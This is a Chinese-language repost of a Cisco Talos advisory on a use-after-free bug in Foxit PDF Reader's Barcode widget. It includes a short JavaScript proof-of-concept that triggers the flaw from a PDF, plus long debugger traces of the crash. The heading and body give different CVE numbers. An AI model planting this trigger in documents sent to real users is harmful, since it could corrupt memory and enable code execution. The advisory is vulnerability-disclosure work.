(CVE-2024-31852)福昕阅读器条形码小部件 Calculate 事件

admin
admin
admin
104956
文章
87
评论
2024年5月7日13:22:45评论12 views字数 14442阅读48分8秒阅读模式

(CVE-2024-31852)福昕阅读器条形码小部件 Calculate 事件

CVE 编号

CVE-2024-25938

概括

Foxit Reader 2024.1.0.23997 处理 Barcode 小部件的方式存在释放后使用漏洞。恶意 PDF 文档中特制的 JavaScript 代码可以触发先前释放的对象的重用,这可能导致内存损坏并导致任意代码执行。攻击者需要诱骗用户打开恶意文件才能触发此漏洞。如果启用了浏览器插件扩展,用户访问特制的恶意网站也可能被利用。

已确认的易受攻击版本

以下版本已被 Talos 测试或验证为易受攻击,或被供应商确认为易受攻击。

福昕阅读器2024.1.0.23997

产品网址

福昕阅读器 - https://www.foxitsoftware.com/pdf-reader/

CVSSV3 分数

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416 - 释放后使用

细节

Foxit PDF Reader是最受欢迎的PDF文档阅读器之一。它的目标是与 Adobe 的 Acrobat Reader 功能相同。作为一个完整且功能丰富的 PDF 阅读器,它支持 JavaScript 来实现交互式文档和动态表单。JavaScript 支持带来了额外的攻击面。Foxit Reader使用V8 JavaScript引擎。

PDF 渲染器和编辑器中的 JavaScript 支持使动态文档能够根据用户输入或事件进行更改。Foxit Reader处理Barcode对象的方式存在释放后使用漏洞。这可以通过以下概念验证代码来说明:

function main() {     getField('Barcode Field0').setAction("Calculate",'delete_pages();');     app.activeDocs[0].getField('Barcode Field0').buttonSetIcon( );  }function delete_pages() {     app.activeDocs[0].deletePages();    app.activeDocs[0].deletePages();}

Calculate上面的代码只是为该字段的 Barcode 分配了一个回调函数Barcode Field0,该回调函数会在第二次调用 时立即触发getField。在操作回调中,发生的所有事情都是对 的调用deletePages,这最终会释放与页面关联的所有对象。当 Barcode 对象在deletePages()未经任何验证的情况下被释放并使用时,就会发生释放后使用漏洞。我们可以在调试器中观察到以下内容(启用 PageHeap):

0:000> geax=072fe130 ebx=072fe19c ecx=029940a0 edx=00000002 esi=12f4cb88 edi=12f4cb48eip=02cd56e9 esp=072fe108 ebp=072fe148 iopl=0         nv up ei pl nz na pe nccs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206FoxitPDFReader!FXJSE_GetClass+0x269:02cd56e9 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x11f9270 (029940a0)} 0:000> geax=00d7f9a0 ebx=072fe19c ecx=12f53500 edx=046b9308 esi=12f4cb88 edi=12f4cb48eip=029bbb4d esp=072fdea4 ebp=072fdf4c iopl=0         nv up ei pl nz na pe nccs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206FoxitPDFReader!safe_vsnprintf+0x1220d1d:029bbb4d ffd0            call    eax {FoxitPDFReader!CryptUIWizExport+0x36b20 (00d7f9a0)}0:000> gin   javascript::Field::UpdateFormFieldeax=00d7f9a0 ebx=072fe19c ecx=12f53500 edx=046b9308 esi=12f4cb88 edi=12f4cb48eip=029bbb4d esp=072fdea4 ebp=072fdf4c iopl=0         nv up ei pl nz na pe nccs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206FoxitPDFReader!safe_vsnprintf+0x1220d1d:029bbb4d ffd0            call    eax {FoxitPDFReader!CryptUIWizExport+0x36b20 (00d7f9a0)}0:000> geax=072fd698 ebx=072fd704 ecx=02904f80 edx=00000002 esi=1029b318 edi=12ff2a58eip=02cd56e9 esp=072fd670 ebp=072fd6b0 iopl=0         nv up ei pl nz na pe nccs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206FoxitPDFReader!FXJSE_GetClass+0x269:02cd56e9 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02904f80)} ; <------ (1)0:000> gModLoad: 695d0000 69927000   C:Program Files (x86)Foxit SoftwareFoxit PDF ReaderpluginsPDFAccessibility.fpieax=072fd698 ebx=072fd704 ecx=02904f80 edx=00000002 esi=10b39840 edi=10b39800eip=02cd56e9 esp=072fd670 ebp=072fd6b0 iopl=0         nv up ei pl nz na po nccs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202FoxitPDFReader!FXJSE_GetClass+0x269:02cd56e9 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02904f80)} ; <------ (2)0:000> geax=072fafa8 ebx=132feb6c ecx=132fe9b0 edx=07111000 esi=132feb68 edi=12fdb7b0eip=005aad36 esp=072fafcc ebp=072fd3f4 iopl=0         nv up ei pl nz na po nccs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb886:005aad36 8b01            mov     eax,dword ptr [ecx]  ds:002b:132fe9b0=0472e7940:000> dd ecx                                                                 ;<--------------- (3)132fe9b0  0472e794 132fea50 186d2520 12d6c488132fe9c0  e0e0e000 00000001 10b9c9e8 01000101132fe9d0  00000004 00000000 132fea90 00000000132fe9e0  10b9c944 135b0a40 0f5fd160 00000001132fe9f0  00000000 00000000 00000000 00000000132fea00  00000000 e0e0e001 00000000 12f53500132fea10  00000000 a0a0a0a0 a0a0a0a0 f0f0f0f0132fea20  00000000 00000000 86981040 107701520:000> peax=0472e794 ebx=132feb6c ecx=132fe9b0 edx=07111000 esi=132feb68 edi=12fdb7b0eip=005aad38 esp=072fafcc ebp=072fd3f4 iopl=0         nv up ei pl nz na po nccs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb888:005aad38 6a01            push    10:000> peax=0472e794 ebx=132feb6c ecx=132fe9b0 edx=07111000 esi=132feb68 edi=12fdb7b0eip=005aad3a esp=072fafc8 ebp=072fd3f4 iopl=0         nv up ei pl nz na po nccs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb88a:005aad3a ff5004          call    dword ptr [eax+4]    ds:002b:0472e798=0174e360 ; <------ (4)0:000> peax=132fe9b0 ebx=132feb6c ecx=132fe9b0 edx=00000001 esi=132feb68 edi=12fdb7b0eip=005aad3d esp=072fafcc ebp=072fd3f4 iopl=0         nv up ei pl nz na po nccs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb88d:005aad3d 83c604          add     esi,4                      0:000> dd ecx                                                                  ; <------ (5)     132fe9b0  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0132fe9c0  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0132fe9d0  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0132fe9e0  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0132fe9f0  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0132fea00  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0132fea10  f0f0f0f0 a0a0a0a0 a0a0a0a0 f0f0f0f0132fea20  00000000 00000000 86981040 10770152

在上面[1]及[2]以上,调用javascript::CFXJS_Document::deletePages_static与 JavaScript API 关联的方法。deletePages()对该方法的第二次调用调用该类deletePages_static()的析构函数方法。此析构函数调用会释放易受攻击的对象。在和 处检查易受攻击对象的值。它显示调用析构函数方法之前和之后的值。易受攻击的对象是一种 Barcode 对象,稍后无需任何验证即可使用。崩溃时可以在调试器中观察到这一点:CBF_Widget[4]CBF_WidgetCBF_Widget[3][5]CBF_Widget

0:000> geax=ffffffff ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=135b0a40 edi=0472e16ceip=0174914c esp=072fde24 ebp=072fde80 iopl=0         nv up ei pl zr na pe cycs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4ffe9c:0174914c c20800          ret     80:000> teax=ffffffff ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=135b0a40 edi=0472e16ceip=01758f54 esp=072fde30 ebp=072fde80 iopl=0         nv up ei pl zr na pe cycs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fca4:01758f54 8b7334          mov     esi,dword ptr [ebx+34h] ds:002b:132fe9e4=f0f0f0f00:000> peax=ffffffff ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=f0f0f0f0 edi=0472e16ceip=01758f57 esp=072fde30 ebp=072fde80 iopl=0         nv up ei pl zr na pe cycs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fca7:01758f57 8d4350          lea     eax,[ebx+50h]0:000> peax=132fea00 ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=f0f0f0f0 edi=0472e16ceip=01758f5a esp=072fde30 ebp=072fde80 iopl=0         nv up ei pl zr na pe cycs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcaa:01758f5a 50              push    eax0:000> peax=132fea00 ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=f0f0f0f0 edi=0472e16ceip=01758f5b esp=072fde2c ebp=072fde80 iopl=0         nv up ei pl zr na pe cycs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcab:01758f5b ff7510          push    dword ptr [ebp+10h]  ss:002b:072fde90=000000010:000> peax=132fea00 ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=f0f0f0f0 edi=0472e16ceip=01758f5e esp=072fde28 ebp=072fde80 iopl=0         nv up ei pl zr na pe cycs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcae:01758f5e 8bcb            mov     ecx,ebx0:000> peax=132fea00 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16ceip=01758f60 esp=072fde28 ebp=072fde80 iopl=0         nv up ei pl zr na pe cycs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcb0:01758f60 c70000000000    mov     dword ptr [eax],0    ds:002b:132fea00=f0f0f0f00:000> peax=132fea00 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16ceip=01758f66 esp=072fde28 ebp=072fde80 iopl=0         nv up ei pl zr na pe cycs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcb6:01758f66 ff75e8          push    dword ptr [ebp-18h]  ss:002b:072fde68=186ce0200:000> peax=132fea00 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16ceip=01758f69 esp=072fde24 ebp=072fde80 iopl=0         nv up ei pl zr na pe cycs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcb9:01758f69 e8920546ff      call    FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf0 (00bb9500) <----- (6)0:000> teax=132fea00 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16ceip=00bb9500 esp=072fde20 ebp=072fde80 iopl=0         nv up ei pl zr na pe cycs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf0:00bb9500 8b410c          mov     eax,dword ptr [ecx+0Ch] ds:002b:132fe9bc=f0f0f0f0 ; <--------------- (7)0:000> peax=f0f0f0f0 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16ceip=00bb9503 esp=072fde20 ebp=072fde80 iopl=0         nv up ei pl zr na pe cycs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf3:00bb9503 85c0            test    eax,eax0:000> peax=f0f0f0f0 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16ceip=00bb9505 esp=072fde20 ebp=072fde80 iopl=0         nv up ei ng nz na pe nccs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf5:00bb9505 7403            je      FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddfa (00bb950a) [br=0]0:000> peax=f0f0f0f0 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16ceip=00bb9507 esp=072fde20 ebp=072fde80 iopl=0         nv up ei ng nz na pe nccs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf7:00bb9507 8b00            mov     eax,dword ptr [eax]  ds:002b:f0f0f0f0=???????? ; <--------------- (8)0:000> p(167c.41c): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=f0f0f0f0 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16ceip=00bb9507 esp=072fde20 ebp=072fde80 iopl=0         nv up ei ng nz na pe nccs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210286FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf7:00bb9507 8b00            mov     eax,dword ptr [eax]  ds:002b:f0f0f0f0=????????0:000> uFoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf7:00bb9507 8b00            mov     eax,dword ptr [eax]00bb9509 c3              ret00bb950a 33c0            xor     eax,eax00bb950c c3              ret00bb950d cc              int     300bb950e cc              int     300bb950f cc              int     300bb9510 51              push    ecx0:000> kb # ChildEBP RetAddr      Args to Child              WARNING: Stack unwind information not available. Following frames may be wrong.00 072fde80 01758785     00000000 00000000 00000001 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf701 072fde9c 029bbb4f     00000000 00000000 00000001 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50f4d502 072fdf4c 029c3b3c     13055370 186ce110 00000000 FoxitPDFReader!safe_vsnprintf+0x1220d1f03 072fe060 02994349     12f4cb48 072fe128 072fe0a8 FoxitPDFReader!safe_vsnprintf+0x1228d0c04 072fe100 02cd56eb     12f4cb48 072fe130 072fe128 FoxitPDFReader!safe_vsnprintf+0x11f951905 072fe148 02eb9a6b     131bed70 18dad269 131bed70 FoxitPDFReader!FXJSE_GetClass+0x26b06 072fe1b0 02eb922e     072fe1f8 18dad269 072fe2d4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3cab07 072fe244 02eb94e5     072fe274 131bed70 072fe2d4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e346e08 072fe28c 02eb936b     072fe2a4 00000007 072fe2e8 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e372509 072fe2a8 030db17b     00000007 072fe2e8 131bed70 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e35ab0a 072fe2c8 030771d9     00082339 18dadb6d 0000000e FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4053bb0b 072fe310 030771d9     18dbeb6d 18f51dc9 18f51e1d FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a14190c 072fe33c 03075860     18dbeb6d 000821b1 18f51dc9 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a14190d 072fe354 03075689     00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39faa00e 072fe380 02d11f4e     131bed70 00082339 18f51dc9 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39f8c90f 072fe490 02d11a42     072fe624 131bed70 072fe4ec FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c18e10 072fe518 02cfa744     072fe624 131bed70 15a824c4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bc8211 072fe6c8 02cfa240     072fe764 15a824ec 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2498412 072fe6dc 02cd3c5f     072fe764 15a824ec 3d298585 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2448013 072fe754 02cd4596     15a824c4 15a823d0 15a824b0 FoxitPDFReader!FXJSE_Runtime_Release+0xeaf14 072fe790 02878af7     15826350 186b928c 15a823d0 FoxitPDFReader!FXJSE_ExecuteScript+0x8615 072fe848 0287a129     00000000 072fe8d8 072fe880 FoxitPDFReader!safe_vsnprintf+0x10ddcc716 072fe860 00bb20df     072fe8d8 072fe880 3d298a41 FoxitPDFReader!safe_vsnprintf+0x10df2f917 072fe890 00bb0fa4     15825e28 00000015 072fe8b8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c69cf18 072fe8d0 00baf9d0     186da020 1315e280 10bf3bc8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c589419 072fe924 0049d322     072fe954 1315e280 10bf3bc8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c42c01a 072fe974 0071901b     00000000 3d299749 7fffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x88521b 072ff598 03cb9713     00000000 00000000 3d2994b9 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x6194b1c 072ff668 03cba8ec     00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x199cc31d 072ff68c 03cb5292     00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x19ae9c1e 072ff700 03cb5b05     13076098 000d02c2 00000429 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1958421f 072ff720 750c120b     000d02c2 00000429 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1960b520 072ff74c 750b81ca     03cb5ad1 000d02c2 00000429 USER32!AddClipboardFormatListener+0x4b21 072ff830 750b5f2a     03cb5ad1 00000000 00000429 USER32!GetClassLongW+0x7ba22 072ff8a4 750b5cf0     00000329 072ff8cc 0069f324 USER32!DispatchMessageW+0x24a23 072ff8b0 0069f324     0c3c8fe8 0c3c8fe8 057d98e8 USER32!DispatchMessageW+0x1024 072ff8cc 0069f3e3     057d98e8 0069f350 ffffffff FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dfe7425 072ff8ec 040e29c2     00000000 0580550c 0710e000 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dff3326 072ff904 03e9cef1     00250000 00000000 0c3653c4 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5c2f7227 072ff950 76ddfcc9     0710e000 76ddfcb0 072ff9bc FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x37d4a128 072ff960 77247c6e     0710e000 8017ce93 00000000 KERNEL32!BaseThreadInitThunk+0x1929 072ff9bc 77247c3e     ffffffff 77268c33 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0x11e2a 072ff9cc 00000000     03e9cfc0 0710e000 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0xee

[6]上面,易受攻击的CBF_Widget对象调用该CBA_Annot::GetPage方法。在 中CBA_Annot::GetPage(),易受攻击的已释放CBF_Widget对象在 处取消引用[7]。这直接导致释放后使用情况并导致崩溃。根据进程的内存布局,可能会进行任意读写访问,最终可能被滥用以实现任意代码执行。

供应商回应

供应商已提供更新版本

时间线

2024-04-01 - 供应商披露

2024-04-28 - 供应商补丁发布

2024-04-30 - 公开发布

信用

由 Cisco Talos 的 KPC 发现。

漏洞报告地址:

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1958

原文始发于微信公众号(Ots安全):(CVE-2024-31852)福昕阅读器条形码小部件 Calculate 事件

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月7日13:22:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   (CVE-2024-31852)福昕阅读器条形码小部件 Calculate 事件https://cn-sec.com/archives/2704995.html

发表评论

匿名网友 填写信息